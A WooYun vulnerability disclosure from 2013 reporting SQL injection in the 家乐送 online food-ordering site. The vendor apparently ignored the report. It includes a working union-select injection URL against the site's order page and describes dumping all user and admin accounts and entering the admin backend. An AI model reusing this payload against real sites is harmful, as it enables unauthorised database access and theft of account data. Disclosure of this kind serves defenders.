当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033417

漏洞标题:家乐送网上订餐系统SQL注射漏洞

相关厂商:家乐送

漏洞作者: 离开鱼的猫

提交时间:2013-08-05 11:54

修复时间:2013-09-19 11:54

公开时间:2013-09-19 11:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

家乐送SQL注射漏洞

详细说明:

先去主页上注册个帐号www.4008267267.com,在订单单页就可以注入了,没有任何过滤。

漏洞证明:

http://www.4008267267.com/orderxx.php?ID=319304%20and%201=2%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21

QQ截图20130803185340.jpg


是root用户
爆数据库帐号

QQ截图20130803155114.jpg


放到注入工具里跑一下。爆出所有用户帐号和管理员的帐号

QQ截图20130803185938.jpg


QQ截图20130803185956.jpg


进入后台

QQ截图20130803140707.jpg

修复方案:

过滤

版权声明:转载请注明来源 离开鱼的猫@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝